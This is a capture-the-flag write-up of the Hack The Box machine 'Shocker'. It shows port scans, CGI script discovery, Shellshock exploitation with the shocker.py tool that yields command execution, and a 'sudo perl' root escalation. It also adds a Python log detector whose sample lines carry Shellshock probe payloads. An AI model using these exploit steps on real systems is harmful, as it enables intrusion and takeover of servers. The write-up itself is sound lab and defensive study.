Port scan

┌──(mikannse㉿kali)-[~/HTB/shocker]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 23:58 CST
Warning: 10.10.10.56 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.56
Host is up (0.074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 10.87 seconds
┌──(mikannse㉿kali)-[~/HTB/shocker]
└─$ sudo nmap -sT -sV -sC -O -p80,2222 10.10.10.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 23:59 CST
Nmap scan report for 10.10.10.56
Host is up (0.077s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Linux 3.12 (93%), Linux 3.13 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.00 seconds

Web

Port 80 hangs and never finishes loading, so there is nothing to get from it directly, but given the box name "shocker" it is obviously Shellshock. Visit /cgi-bin and then brute-force the gateway scripts under it; a plain directory scan should also turn up /cgi-bin.

┌──(mikannse㉿kali)-[~/HTB/shocker]
└─$ feroxbuster -u http://10.10.10.56/cgi-bin -x py,sh,pl,cgi

by Ben "epi" Risher 🤓 ver: 2.10.4
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.56/cgi-bin
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.4
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [py, sh, pl, cgi]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 11l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 7l 17w 118c http://10.10.10.56/cgi-bin/user.sh

Pull out shocker.py

┌──(mikannse㉿kali)-[~/HTB/shocker]
└─$ python2 shocker.py -H 10.10.10.56 -c /cgi-bin/user.sh


Tom Watson, tom.watson@nccgroup.trust
https://www.github.com/nccgroup/shocker

Released under the GNU Affero General Public License
(https://www.gnu.org/licenses/agpl-3.0.html)


[+] Single target '/cgi-bin/user.sh' being used
[+] Checking connectivity with target...
[+] Target was reachable
[+] Looking for vulnerabilities on 10.10.10.56:80
[+] 1 potential target found, attempting exploits
[+] The following URLs appear to be exploitable:
[1] http://10.10.10.56:80/cgi-bin/user.sh
[+] Would you like to exploit further?
[>] Enter an URL number or 0 to exit: 1
[+] Entering interactive mode for http://10.10.10.56:80/cgi-bin/user.sh
[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'
> /usr/bin/whoami
< shelly

From there, just pop a reverse shell.
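As an added example for the defender side (not code from the original writeup or from the shocker tool), here is a small Python detector that parses Apache combined-format access logs and flags requests whose Referer or User-Agent carries the Shellshock function-definition prefix that mod_cgi would export into a script's environment. The log lines, IPs and timestamps are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed Apache "combined" log lines (made-up IPs/timestamps, not from the box).
# mod_cgi exports request headers such as User-Agent and Referer into the script's
# environment (HTTP_USER_AGENT, HTTP_REFERER), so Shellshock probes land in those fields.
SAMPLE_LOG = """\
10.10.14.5 - - [02/Sep/2024:23:59:10 +0800] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"
10.10.14.5 - - [02/Sep/2024:23:59:12 +0800] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; /usr/bin/whoami"
10.10.14.5 - - [02/Sep/2024:23:59:13 +0800] "GET /index.html HTTP/1.1" 200 137 "() { :; }; echo x" "curl/8.0"
10.10.14.7 - - [02/Sep/2024:23:59:20 +0800] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "python-requests/2.31"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The function-definition prefix that vulnerable bash imported from the environment: "() {".
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_probes(log_text: str) -> List[Dict[str, object]]:
    """One record per request whose Referer or User-Agent carries the '() {' prefix;
    'cgi' flags requests to /cgi-bin/, where the header actually reaches a script."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue  # skip lines that are not combined-format entries
        for field in ("referer", "ua"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"ip": rec["ip"], "request": rec["req"], "field": field,
                             "value": rec[field], "cgi": "/cgi-bin/" in rec["req"]})
                break  # one record per line even if both headers match
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(hit)
```

Hits against non-CGI paths are still worth recording: they show the same source probing before it finds a script that will actually run.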

Privilege escalation

One shot: sudo perl -e 'exec "/bin/sh";'

Closing thoughts

Honestly a very easy box, but it gave me a deeper understanding of CGI gateways and of how the vulnerability works.